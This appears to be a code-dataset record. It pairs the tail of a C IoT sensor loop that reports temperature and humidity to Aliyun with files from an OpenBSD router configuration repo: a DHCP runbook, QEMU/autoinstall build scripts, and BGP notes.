(cnt > 200) cnt = 0; } /* Linkkit start */ ret = linkkit_init(); if (ret != 0){ return; } /* Register linkkit initialize callback */ IOT_RegisterCallback(ITE_INITIALIZE_COMPLETED, user_initialized); memset(&master_meta_info, 0, sizeof(iotx_linkkit_dev_meta_info_t)); #if 0 memcpy(master_meta_info.product_key, PRODUCT_KEY, strlen(PRODUCT_KEY)); memcpy(master_meta_info.product_secret, PRODUCT_SECRET, strlen(PRODUCT_SECRET)); memcpy(master_meta_info.device_name, DEVICE_NAME, strlen(DEVICE_NAME)); memcpy(master_meta_info.device_secret, DEVICE_SECRET, strlen(DEVICE_SECRET)); #else HAL_GetProductKey(master_meta_info.product_key); HAL_GetDeviceName(master_meta_info.device_name); HAL_GetDeviceSecret(master_meta_info.device_secret); #endif /* Create a new device */ user_ctx->master_devid = IOT_Linkkit_Open(IOTX_LINKKIT_DEV_TYPE_MASTER, &master_meta_info); if (user_ctx->master_devid < 0) { printf("IOT_Linkkit_Open Failed\n"); return; } /* Start Connect Aliyun Server */ ret = IOT_Linkkit_Connect(user_ctx->master_devid); if (ret < 0) { printf("IOT_Linkkit_Connect Failed\n"); return; } #if 0 /* Open the acceleration sensor device */ ret = sensor_hal_open(TAG_DEV_ACC, 0); if (ret != 0) { return; } #endif { static char buff[128] = "user/get"; static iotx_user_subscribe_context context={buff,usr_message_arrive2}; IOT_Ioctl(IOTX_IOCTL_SUB_USER_TOPIC,&context); } /* Enter loop run to handle linkkit event */ while (1) { float temp; static bool bflag =false; /* Read the temperature sensor data */ hal_gpio_output_low(&brd_gpio_table[GPIO_LED_3]); temp = g_temp; { /* Print the temperature sensor data */ printf("\nTemperature value : %.1f centidegree\n", ((float)temp)); memset(param, 0, 128); /* build the report payload */ sprintf(param, PROP_POST_FORMAT_TEMP, ((float)(temp))); /* Report the temperature data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } temp = g_humi; { /* Print the temperature sensor data */ printf("\nHumi value : %.1f \n", ((float)temp)); memset(param, 0, 128); /* build the report payload */ sprintf(param, PROP_POST_FORMAT_HUMI, ((float)(temp))); /* Report the temperature data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } bflag = !bflag; if(bflag) { /* Print the temperature sensor data */ memset(param, 0, 128); char alarmstatus = 0; if ((g_temp > alarm_setting) && (!alarm_clear)) alarmstatus = 1; /* build the report payload */ sprintf(param, PROP_POST_FORMAT_ALARMSTATUS, alarmstatus); /* Report the temperature data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } hal_gpio_output_high(&brd_gpio_table[GPIO_LED_3]); IOT_Linkkit_Yield(15000); } }
72b93a7379feaebf1234eaa7ca372511d34acaed
[ "Markdown", "C", "Makefile" ]
8
Makefile
lihaijun7781/Alithings-3.0.0
64d5f1d44b15cca1ad9de6542a11ca6a0d64d55b
918e15076c419d89101334300bce4ee0390d0171
refs/heads/master
<repo_name>ilianaw/config<file_sep>/sea1/docs/adding-ip-address-mappings.md ## Adding an IP Address mapping ### Prereqs * You must have ssh access to the management network (bastion host) * You must have ssh and doas access to the router * You must have engaged the engineer oncall. ### Steps #### Access the wobscale router From the management network, you may access the router at 10.255.255.10 over ssh on port 22. ``` $ ssh 10.255.255.10 $ # Should be on da bsd $ cp /etc/dhcpd.conf $HOME/dhcpd.conf $ vim $HOME/dhcpd.conf # do some editing # Respect the existing format. Mimic it. Love it. TODO, document it and ansible it. $ dhcpd -n -c $HOME/dhcpd.conf && echo $? 0 # Validate. No ip or mac should be duplicated. Ever. Feel free to do a `grep -E "\d+.\d+.\d+.\d+" | uniq -c` type magic (note: totally untested one-liner for that file) $ doas mv $HOME/dhcpd.conf /etc/dhcpd.conf $ doas /etc/rc.d/dhcpd check # Service is running $ doas /etc/rc.d/dhcpd restart $ doas /etc/rc.d/dhcpd check # Service is running $ sleep 3 $ doas /etc/rc.d/dhcpd check # Service is running # Fuckit shipit ``` <file_sep>/sea1/router/autoinstall/serve_autoinstall.sh #!/bin/bash -e # SPDX-License-Identifier: GPL-3.0-only . vars SCRIPTPATH="$(cd "$(dirname "$0")"; pwd -P)" cd "$SCRIPTPATH" DATA=$(cat <<EOF System hostname = edge DNS domain name = sea1.wobscale.website Password for root = ************* Public ssh key for root = $(cat tmp/id_ed25519.pub) Allow root ssh login = prohibit-password Do you expect to run the X Window System = no Location of sets = http HTTP Server = $OPENBSD_MIRROR Server directory = $OPENBSD_PATH/amd64 Set name(s) = -all bsd.mp base* comp* man* Are you *SURE* your install is complete without 'bsd' = yes EOF ) echo -en "HTTP/1.1 200 k\r\n" echo -en "Content-Type: text/plain; charset=UTF-8\r\n" echo -en "Content-Length: $((${#DATA}+1))\r\n\r\n" echo "$DATA" <file_sep>/sea1/router/README.md This is the Ansible role for Wobscale's Seattle router, present on the Seattle Internet Exchange. The supported version of Ansible is the version available in [OpenBSD Ports](https://www.openbsd.org/faq/ports/) for the release we are currently using. For [OpenBSD 6.3 ports](https://cloudflare.cdn.openbsd.org/pub/OpenBSD/6.3/packages/amd64/) that version is 2.4.3.0. ## Running Ansible Run Ansible from the `sea1` directory (one above this README.md). First, check your changes: ```plain ansible-playbook -b --become-method=doas --check --diff router/playbook.yaml ``` Make your changes: ```plain ansible-playbook -b --become-method=doas router/playbook.yaml ``` <file_sep>/sea1/router/autoinstall/build.sh #!/bin/bash # SPDX-License-Identifier: GPL-3.0-only set -euo pipefail # TODO: perhaps boot with a serial console and use expect to automatically type the autoinstall bits # or perhaps: not . vars config_repo="${1:-https://github.com/wobscale/config.git}" config_branch="${2:-master}" die() { echo "$1" exit 1 } bold() { tput bold echo "$1" tput sgr0 } vm_ssh() { echo "# $1" | grep -v "^# true$" ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o LogLevel=QUIET \ -i tmp/id_ed25519 localhost -p 7922 -l root -t "$1" } boot_wait() { while ! vm_ssh true; do sleep 1; done sleep 10 # wait for init to settle } SCRIPTPATH="$(cd "$(dirname "$0")"; pwd -P)" cd "$SCRIPTPATH" ## Download and run cdXY.iso ISO_NAME="cd$(tr -d . <<<"$OPENBSD_RELEASE").iso" [[ -e "$ISO_NAME.sha256" ]] || die "$ISO_NAME.sha256 missing" [[ -e "$ISO_NAME" ]] || curl -O "https://$OPENBSD_MIRROR/$OPENBSD_PATH/amd64/$ISO_NAME" sha256sum -c "$ISO_NAME.sha256" mkdir -p tmp rm -f system.img tmp/id_ed25519 truncate -s 100G system.img ssh-keygen -t ed25519 -f tmp/id_ed25519 -N '' bold "Type [A] [Enter] at the \"Welcome to OpenBSD\" prompt" bold "Enter http://10.0.2.42/install.conf for the response file location" qemu-system-x86_64 \ -drive file=system.img,media=disk,format=raw \ -drive file=$ISO_NAME,media=cdrom \ -m 2048 -enable-kvm -smp 4 \ -netdev user,id=mynet0,hostfwd=tcp:127.0.0.1:7922-:22,guestfwd=tcp:10.0.2.42:80-cmd:$SCRIPTPATH/serve_autoinstall.sh \ -device e1000,netdev=mynet0 & boot_wait vm_ssh "syspatch" vm_ssh "echo 'github.com,192.168.3.11 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa+PXYPCPy6rbTrTtw7PHkccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJizHhbn2mUjvSAHQqZETYP81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf+Se8xhHTvKSCZIFImWwoG6mbUoWf9nzpIoaSjB+weqqUUmpaaasXVal72J+UX2B+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lGHSZXy28G3skua2SmVi/w4yCE6gbODqnTWlg7+wC604ydGXA8VJiS5ap43JXiUFFAaQ==' >> .ssh/known_hosts" vm_ssh "pkg_add ansible git" vm_ssh "cd /usr/src && git clone https://github.com/wobscale/openbsd-sys.git sys" vm_ssh "cd /usr/src/sys/arch/amd64/compile/GENERIC.MP && make obj && make config && make -j5 && make install" vm_ssh "git clone -b ${config_branch} ${config_repo} config && cd config && sed -i -e 's/^edge.sea1.*$/& ansible_connection=local/' sea1/hosts" ### Commands that require hitting the internet must go above this *final* line vm_ssh "cd config/sea1 && ansible-playbook --diff router/playbook.yaml && shutdown -p now && exit" wait <file_sep>/README.md The collection of files, Ansible roles, and scripts that helps Wobscale scale the wob. ## Licensing The code and Ansible playbooks are licensed under the [GNU General Public License v3.0](https://www.gnu.org/licenses/gpl-3.0.en.html). Documentation is licensed under the [CC0 1.0 Universal license](https://creativecommons.org/publicdomain/zero/1.0/). When in doubt, check the SPDX-License-Identifier header in any file. All files must have a SPDX-License-Identifier unless it is a short configuration file. <file_sep>/sea1/docs/router-misc.md ## Handy commands ### BGP ``` $ bgpctl show ``` ``` $ bgpctl show ip bgp 8.8.8.8 ``` #### Inspecting route-stuffs Useful for figuring out how routing tables are ``` $ route show ```
527b9fc9e1e3334b6699726870cc5c0c4128e7a7
[ "Markdown", "Shell" ]
6
Markdown
ilianaw/config
a10c540760b73b7b24c58c34628b68c870beed63
3a0a29ee027ed8ad490a1186cd0ae9e9708d77e1